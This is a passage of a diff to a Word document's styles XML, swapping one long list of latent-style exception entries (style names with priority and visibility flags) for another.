-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
+    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
+    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
+    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="59" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
+    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
